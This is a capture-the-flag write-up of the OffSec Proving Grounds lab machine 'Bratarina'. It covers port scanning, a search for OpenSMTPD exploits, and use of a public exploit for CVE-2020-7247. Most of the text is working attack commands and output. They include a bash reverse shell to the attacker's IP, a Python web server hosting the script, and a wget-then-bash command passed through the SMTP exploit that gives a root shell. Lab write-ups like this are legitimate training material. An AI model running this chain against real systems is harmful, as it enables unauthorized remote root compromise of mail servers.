Bratarina

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.225.71
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-05 08:38 +03
Nmap scan report for 192.168.225.71                                                   
Host is up, received echo-reply ttl 61 (0.17s latency).                                                                                                                     
Scanned at 2025-10-05 08:38:56 +03 for 231s                                           
Not shown: 65530 filtered tcp ports (no-response)                                     
PORT    STATE  SERVICE     REASON         VERSION                                                                                                                           
22/tcp  open   ssh         syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                      
| ssh-hostkey:                                                                                                                                                              
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)                        
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQ
klpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YF
XstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf                                                
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)                                                                                                             
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=          
|   256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)                     
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT    
25/tcp  open   smtp        syn-ack ttl 61 OpenSMTPD                                                                                                                         
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.235], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP                             
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info                       
80/tcp  open   http        syn-ack ttl 61 nginx 1.14.0 (Ubuntu)                                                                                                             
|_http-title:         Page not found - FlaskBB                                        
|_http-server-header: nginx/1.14.0 (Ubuntu)                                           
445/tcp open   netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)                                                                                   
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have ssh running on port 22, smtp on port 25, http on port 80, and finally samba on port 445.

We will start with those ports one by one.

For 22 we can not do anything unless we have a set of credentials, or it is an old version, or we can perform brute forcing on some known users like root, etc.

For port 445 and port 80, I did not find anything useful actually.

Exploitation:

SMTP (25):

We will search for any public exploits for OpenSMTPD:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]                                                                                                                  
└─$ searchsploit OpenSMTPD                                                                                                                                                  
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path                           
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)                                                                                  | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)                                                                              | linux/local/48185.rb            
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution                                                              | openbsd/remote/48051.pl         
OpenSMTPD 6.6.1 - Remote Code Execution                                                                                                   | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read                                                                                                     | linux/remote/48139.c            
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution                                                                  | openbsd/remote/48140.c          
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

We can try any of them blindly:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ searchsploit -m linux/remote/47984.py
  Exploit: OpenSMTPD 6.6.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47984
     Path: /usr/share/exploitdb/exploits/linux/remote/47984.py
    Codes: CVE-2020-7247
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Bratarina/47984.py

The exploit above, exploit command execution vulnerability in smtp in the mail field of the mail.

When we run it without any arguments:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py                                 
Usage 47984.py <target ip> <target port> <command>
E.g. 47984.py 127.0.0.1 25 'touch /tmp/x'

We will first check if this is a valid exploit by first trying to ping our own host using ping and tcpdump:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

We will send a ping requests:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py 192.168.225.71 25 'ping 192.168.45.235 -c 4'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:04:40.795116 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 1, length 64
09:04:40.795498 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 1, length 64
09:04:41.751491 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 2, length 64
09:04:41.751526 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 2, length 64
09:04:42.868668 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 3, length 64
09:04:42.868706 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 3, length 64
09:04:43.831654 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 4, length 64
09:04:43.831691 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 4, length 64

Indeed this the way in.

I will write a simple sh script to give me a reverse shell on port 445 because this was one of the open ports, and host it using a python web server:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ cat shell.sh
#!/bin/bash

bash -i >& /dev/tcp/192.168.45.235/445 0>&1

If you passed it like this as argument to the exploit or even surrounded it with bash -c it will error out because of the special characters.

Host it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Download it to the /tmp folder, then start it with bash (Or we can give it execution permissions and start it itself), but before that we should start our nc listener as well:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ nc -nlvp 445
listening on [any] 445 ...

Run the exploit:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py 192.168.225.71 25 'wget 192.168.45.235/shell.sh -O /tmp/shell.sh; bash /tmp/shell.sh'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Check our web server and the netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.225.71 - - [05/Oct/2025 09:22:09] "GET /shell.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ nc -nlvp 445
listening on [any] 445 ...
connect to [192.168.45.235] from (UNKNOWN) [192.168.225.71] 34198
bash: cannot set terminal process group (1980): Inappropriate ioctl for device
bash: no job control in this shell
root@bratarina:~# id
uid=0(root) gid=0(root) groups=0(root)

We rooted the box.

Get the flag:

root@bratarina:~# cat proof.txt
6bfb0ecf56cdce4d4b1dc5c3e0f7636a